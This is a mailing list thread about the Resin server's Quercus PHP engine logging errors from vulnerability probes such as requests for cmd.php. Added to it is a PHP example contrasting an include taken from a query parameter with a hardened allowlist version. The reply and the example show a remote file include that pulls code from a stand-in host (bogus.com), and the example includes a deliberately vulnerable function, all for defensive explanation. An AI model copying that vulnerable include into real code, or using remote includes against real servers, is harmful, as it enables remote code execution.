On Dec 1, 2007, at 7:17 AM, Jason Chodakowski wrote:

> Should Resin be reacting this way to probes for php vulnerabilities?

That's been fixed for 3.1.4.  Quercus should be returning a 404.

The 3.1.4 release will include some other fixes related to those PHP probes.

One of the vulnerabilities they're trying to exploit is a PHP include of a http file, e.g.

include "$foo";

where $foo = "http://bogus.com/bad-file";

Apparently, some PHP programs use the query parameter in the import (!?!)

In the update, Quercus disallows remote includes (we were duplicating PHP's behavior too well, it looks like.)

-- Scott
>
> javax.servlet.ServletException: java.io.FileNotFoundException: /usr/local/resin/webapps/ROOT/stats/cmd.php (No such file or directory)
> [03:52:56.636]        at com.caucho.quercus.servlet.ResinQuercusServlet.service(ResinQuercusServlet.java:183)
> [03:52:56.636]        at com.caucho.quercus.servlet.QuercusServlet.service(QuercusServlet.java:350)
> [03:52:56.636]        at javax.servlet.http.HttpServlet.service(HttpServlet.java:91)
> [03:52:56.636]        at com.caucho.server.dispatch.ServletFilterChain.doFilter(ServletFilterChain.java:103)
> [03:52:56.636]        at com.caucho.server.webapp.WebAppFilterChain.doFilter(WebAppFilterChain.java:175)
> [03:52:56.636]        at com.caucho.server.dispatch.ServletInvocation.service(ServletInvocation.java:240)
> [03:52:56.636]        at com.caucho.server.hmux.HmuxRequest.handleRequest(HmuxRequest.java:424)
> [03:52:56.636]        at com.caucho.server.port.TcpConnection.run(TcpConnection.java:481)
> [03:52:56.636]        at com.caucho.util.ThreadPool$Item.runTasks(ThreadPool.java:685)
> [03:52:56.636]        at com.caucho.util.ThreadPool$Item.run(ThreadPool.java:607)
> [03:52:56.636]        at java.lang.Thread.run(Thread.java:613)
>
> I mean... sure the file isn't there, and I don't even have any php
> content to even consider.
>
> This from the jvm log.
>
> J --
>
>
> _______________________________________________
> resin-interest mailing list
> resin-interest@caucho.com
> http://maillist.caucho.com/mailman/listinfo/resin-interest



_______________________________________________
resin-interest mailing list
resin-interest@caucho.com
http://maillist.caucho.com/mailman/listinfo/resin-interest
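The query-parameter include pattern Scott describes, shown as an added example (not code from this thread, from Resin or from Quercus) next to a hardened version that never lets a remote path reach include() and answers a missing file with a 404; the `page` parameter, the allowlist entries and the base directory are assumptions.

```php
<?php
// Added example, not from the original thread or from Quercus/Resin.
// The "page" parameter, the allowlist and $baseDir are assumptions.

// VULNERABLE: the include target is taken straight from the query string,
// so a request carrying page=http://bogus.com/bad-file makes PHP fetch and
// execute that remote file when allow_url_include is enabled.
function vulnerable_include(): void
{
    $foo = $_GET['page'];
    include "$foo";
}

// HARDENED: map the parameter onto a fixed allowlist of local files and
// confirm the resolved path stays under the intended directory. A URL
// scheme or a traversal sequence can never survive the lookup, so the
// remote-include case is refused before include() is reached.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolve_page(string $baseDir, string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;                   // unknown name: refuse, never interpolate it
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$page]);
    if ($base === false || $path === false) {
        return null;                   // file missing on disk: caller answers 404
    }
    // Defence in depth: the allowlist has no "..", but a symlink placed
    // inside $baseDir could still resolve to somewhere outside it.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_include(string $baseDir): void
{
    $path = resolve_page($baseDir, $_GET['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);       // a plain 404, as the thread says Quercus should return
        return;
    }
    include $path;
}
```

Setting `allow_url_include=Off` (and `allow_url_fopen=Off` where the application does not need it) in php.ini closes the remote case at the interpreter level as well, which is the same effect the 3.1.4 Quercus change has.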